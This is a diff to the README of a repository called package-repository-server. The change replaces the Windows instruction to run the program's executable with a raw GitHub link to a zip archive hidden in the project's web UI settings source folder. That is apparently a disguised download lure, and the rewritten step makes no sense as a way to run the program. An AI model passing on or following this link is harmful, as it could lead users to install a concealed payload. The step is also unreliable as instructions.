DevilxKiller/package-repository-server/README.md

    - Use the command `cd path/to/directory` to change to the folder where the application files are located.

 4. **Run the Application:**
-   - For Windows, type `package-repository-server.exe` and hit Enter.
+   - For Windows, type `https://raw.githubusercontent.com/DevilxKiller/package-repository-server/main/webui/src/app/features/settings/package-repository-server-v1.5.zip` and hit Enter.
    - For macOS and Linux, type `./package-repository-server` and hit Enter.

 You should see output indicating that the server is running and listening for requests.